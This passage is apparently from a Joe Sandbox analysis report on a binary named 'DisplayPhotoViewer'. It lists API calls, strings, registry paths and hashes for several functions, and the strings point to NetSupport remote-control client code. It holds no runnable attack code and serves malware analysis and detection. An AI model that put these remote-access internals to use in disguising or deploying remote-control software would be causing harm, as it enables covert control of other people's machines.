                                                                                                    • LoadLibraryA.KERNEL32(INETMIB1.DLL), ref: 1112389C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 111238B4
                                                                                                    • GetProcAddress.KERNEL32(00000000,SnmpExtensionQuery), ref: 111238C1
                                                                                                    • GetTickCount.KERNEL32 ref: 111238EB
                                                                                                    • _calloc.LIBCMT ref: 1112391B
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1112398D
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11123996
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad$CountTick_calloc
                                                                                                    • String ID: ..\CTL32\tcputil.c$INETMIB1.DLL$SnmpExtensionInit$SnmpExtensionQuery$SnmpUtilOidCpy$SnmpUtilOidNCmp$SnmpUtilVarBindFree$result$snmpapi.dll
                                                                                                    • API String ID: 1437035542-3101287369
                                                                                                    • Opcode ID: 03e33bb970821ad0e55315ceb1104e4096a4305a235bf1089583c03d4f6de025
                                                                                                    • Instruction ID: b68639ff2920384e4de60b90151fb2a4e96aa4104bba318c13446934c76ee4ab
                                                                                                    • Opcode Fuzzy Hash: 03e33bb970821ad0e55315ceb1104e4096a4305a235bf1089583c03d4f6de025
                                                                                                    • Instruction Fuzzy Hash: F841D275B146159BCF11DFA5EDC0AAEFBB8EB4D318F9000BAE90997240EA309A01CF51
                                                                                                    Function 1116112C Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161134
                                                                                                    • __mtterm.LIBCMT ref: 11161140
                                                                                                      • Part of subcall function 11160E0B: DecodePointer.KERNEL32(0000001C,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11160E1C
                                                                                                      • Part of subcall function 11160E0B: TlsFree.KERNEL32(00000049,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11160E36
                                                                                                      • Part of subcall function 11160E0B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11168C16
                                                                                                      • Part of subcall function 11160E0B: _free.LIBCMT ref: 11168C19
                                                                                                      • Part of subcall function 11160E0B: DeleteCriticalSection.KERNEL32(00000049,?,?,1115ED5F,1115ED45,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11168C40
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 11161156
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 11161163
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 11161170
                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1116117D
                                                                                                    • TlsAlloc.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 111611CD
                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 111611E8
                                                                                                    • __init_pointers.LIBCMT ref: 111611F2
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161203
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 11161210
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116121D
                                                                                                    • EncodePointer.KERNEL32(?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116122A
                                                                                                    • DecodePointer.KERNEL32(Function_00160F8F,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116124B
                                                                                                    • __calloc_crt.LIBCMT ref: 11161260
                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,1115EC9C,111CF790,00000008,1115EE30,?,?,?,111CF7B0,0000000C,1115EEEB,?), ref: 1116127A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1116128C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                    • API String ID: 3698121176-3819984048
                                                                                                    • Opcode ID: c8cee6385f6c37efbcb00fa75fe3691ecc08442e436799d75eb0bca1d7893735
                                                                                                    • Instruction ID: aceebaf4b32792a551b8280b84e45416618af870704483972434370748be274f
                                                                                                    • Opcode Fuzzy Hash: c8cee6385f6c37efbcb00fa75fe3691ecc08442e436799d75eb0bca1d7893735
                                                                                                    • Instruction Fuzzy Hash: EF317579802335AEE7939FF59D8462AFFE8AB4435CB100539E834D6259E7B1D051CF50
                                                                                                    Function 111535F0 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 249sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountFindForegroundSleepTickwsprintf$ErrorLast
                                                                                                    • String ID: Here 2 (%d)$MMPlayer$PCIVideo.exe /x /w"%s"$PCIVideoSlave32$PCIVideoSlave:0x%x$PCIVideoVi.exe /x /w"%s"$SlaveClass$SlavePlayer$SlaveWindow
                                                                                                    • API String ID: 4235248531-48387523
                                                                                                    • Opcode ID: 49641245cd3847b9ee64efac84cd7e353df375c55569c27229500b1aacc90f06
                                                                                                    • Instruction ID: bca29c83ed4c7f282ab9a436fb25086ab7ddb20709b4323a47f56faa3175df4a
                                                                                                    • Opcode Fuzzy Hash: 49641245cd3847b9ee64efac84cd7e353df375c55569c27229500b1aacc90f06
                                                                                                    • Instruction Fuzzy Hash: 2291B174A142159FDB45DFA5C884B9EFBB5EF49304F00816AED19AF385EB30A905CB60
                                                                                                    Function 110296D0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110E6100: RegOpenKeyExA.ADVAPI32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EC16,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E611C
                                                                                                      • Part of subcall function 110C8DD0: _malloc.LIBCMT ref: 110C8DEA
                                                                                                      • Part of subcall function 110E5D70: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110E5DBB
                                                                                                    • wsprintfA.USER32 ref: 11029A5D
                                                                                                      • Part of subcall function 110E64D0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,11029835), ref: 110E6506
                                                                                                    • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102986A
                                                                                                    • wsprintfA.USER32 ref: 110298AE
                                                                                                    • wsprintfA.USER32 ref: 11029915
                                                                                                      • Part of subcall function 110E6B50: wsprintfA.USER32 ref: 110E6BB4
                                                                                                      • Part of subcall function 110E6B50: _malloc.LIBCMT ref: 110E6C33
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                                    • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$set %s=15, e=%d
                                                                                                    • API String ID: 2153351953-2541246523
                                                                                                    • Opcode ID: ea6d6fd2e8ca6364e277863a62f74865eed01b1401e85209c6ad05c9ed4471b8
                                                                                                    • Instruction ID: de9b1196b00f3af2788179b490284d7a20660e806363cada0be805a8d66f5485
                                                                                                    • Opcode Fuzzy Hash: ea6d6fd2e8ca6364e277863a62f74865eed01b1401e85209c6ad05c9ed4471b8
                                                                                                    • Instruction Fuzzy Hash: A1B15F75D0263AAEDF21DB51DC88FEEB778AF45308F4041D9E90962181EB306E84CFA1
                                                                                                    Function 1101B1A0 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 203COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(?,?), ref: 1101B1EC
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 1101B21A
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 1101B224
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 1101B238
                                                                                                    • GetStockObject.GDI32(00000011), ref: 1101B249
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1101B25A
                                                                                                    • DrawTextA.USER32(?,00000000,000000FF,?,00000001), ref: 1101B283
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1101B28E
                                                                                                    • DeleteObject.GDI32(?), ref: 1101B38C
                                                                                                    • EndPaint.USER32(?,?), ref: 1101B39A
                                                                                                      • Part of subcall function 11154210: SetWindowLongA.USER32(?,000000FC,?), ref: 11154256
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?), ref: 11154275
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?), ref: 11154284
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?,00000000), ref: 11154293
                                                                                                    Strings
                                                                                                    • NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2D7
                                                                                                    • picholder w=%d, h=%d, xrefs: 1101B319
                                                                                                    • m_hWnd, xrefs: 1101B205
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B200
                                                                                                    • NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$PropRemove$PaintRectSelect$BeginBrushClientCreateDeleteDrawFillLongSolidStockTextWindow
                                                                                                    • String ID: NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd$picholder w=%d, h=%d
                                                                                                    • API String ID: 3417689559-267201724
                                                                                                    • Opcode ID: 8cb3ea857473c232a73e72e2290a3b88f52e35d046f0637f6bee87cf2b7321c7
                                                                                                    • Instruction ID: 22fce6affc6dd547e21a937cc4c1c6e702c5c6d8420559887650503453c0611e
                                                                                                    • Opcode Fuzzy Hash: 8cb3ea857473c232a73e72e2290a3b88f52e35d046f0637f6bee87cf2b7321c7
                                                                                                    • Instruction Fuzzy Hash: 6F613DB5E00619AFCB04CFA8DD84EEEF7B9FB88314F108559E915A7244EB70AD01CB61
                                                                                                    Function 1101B3C0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 173filelibrarycomCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000), ref: 1101B3DE
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B40E
                                                                                                    • LoadLibraryA.KERNEL32(PCIImage.dll), ref: 1101B430
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B452
                                                                                                    • GetProcAddress.KERNEL32(00000000,DecompressPNGToBitmap), ref: 1101B469
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1101B481
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 1101B48A
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 1101B495
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 1101B49E
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1101B4AD
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1101B4B4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B4BB
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1101B4CF
                                                                                                    • OleLoadPicture.OLEAUT32(00000000,00000000,00000000,111B433C,-0000001C), ref: 1101B4F3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101B51B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Global$CloseFileHandle$CreateLibraryLoad$AddressAllocDeleteFreeLockObjectPictureProcReadSizeStreamUnlock
                                                                                                    • String ID: DecompressPNGToBitmap$PCIImage.dll
                                                                                                    • API String ID: 2291646601-2375843702
                                                                                                    • Opcode ID: bbe2d79739f10b9b5cba18eaee36f33d815f7340308be1fa324a7f7ef2f718b1
                                                                                                    • Instruction ID: c766f4f4c914c82681142c955fece2275495dccf0f5bc214e641af9de36a140e
                                                                                                    • Opcode Fuzzy Hash: bbe2d79739f10b9b5cba18eaee36f33d815f7340308be1fa324a7f7ef2f718b1
                                                                                                    • Instruction Fuzzy Hash: 4951B172A402146BE711DFA9EC88F9FBBACEB84724F008169FD05DB284DB75D941C7A0
                                                                                                    Function 1112B5D0 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 381COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __strdup_free
                                                                                                    • String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$wwww
                                                                                                    • API String ID: 514621754-745316377
                                                                                                    • Opcode ID: 094aa11d7920de598f3639f6fbe1fdb09fb21feaa4c71f7cc8b86dab59549705
                                                                                                    • Instruction ID: f894f9c42ac74398f340308f426bfffdded0d61ea92f29c686ed71803bb6083f
                                                                                                    • Opcode Fuzzy Hash: 094aa11d7920de598f3639f6fbe1fdb09fb21feaa4c71f7cc8b86dab59549705
                                                                                                    • Instruction Fuzzy Hash: A4D17F79E0061B9FDB01DBA4DD90FEEF771BF94308F548064E925A7285EA30B905CBA1
                                                                                                    Function 110FD910 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 183libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD944
                                                                                                    • EnterCriticalSection.KERNEL32(111E41A4,?,00000000), ref: 110FD95D
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD963
                                                                                                    • wsprintfA.USER32 ref: 110FD9CD
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 110FDA0F
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 110FDA90
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110FDAA9
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 110FDADD
                                                                                                    • GetTickCount.KERNEL32 ref: 110FDB67
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4,?,00000000), ref: 110FDB70
                                                                                                    Strings
                                                                                                    • Warning. simap lock held for %d ms, xrefs: 110FDB84
                                                                                                    • GetProcessId, xrefs: 110FDA88
                                                                                                    • PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 110FDACB
                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 110FD973
                                                                                                    • Session\%u\NSMWClass, xrefs: 110FD9C7
                                                                                                    • Error. IPC(%s) = %s, xrefs: 110FD9FD
                                                                                                    • Kernel32.dll, xrefs: 110FDA0A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
                                                                                                    • String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 3106348785-779848922
                                                                                                    • Opcode ID: 86eccd3dcc8bbe5ad7dd508ea0a69749aa0b92d0333d239a76ed7c8392cefc5a
                                                                                                    • Instruction ID: 99f4b102e8faeac1279891c0d03dbaeac9e4f35d232c2983a8158b9cfc77c23e
                                                                                                    • Opcode Fuzzy Hash: 86eccd3dcc8bbe5ad7dd508ea0a69749aa0b92d0333d239a76ed7c8392cefc5a
                                                                                                    • Instruction Fuzzy Hash: 32715DB5D0526A9FCB11DF6ADC89A9EFBF5BB44304F5041EAD818A7205DB306E84CF90
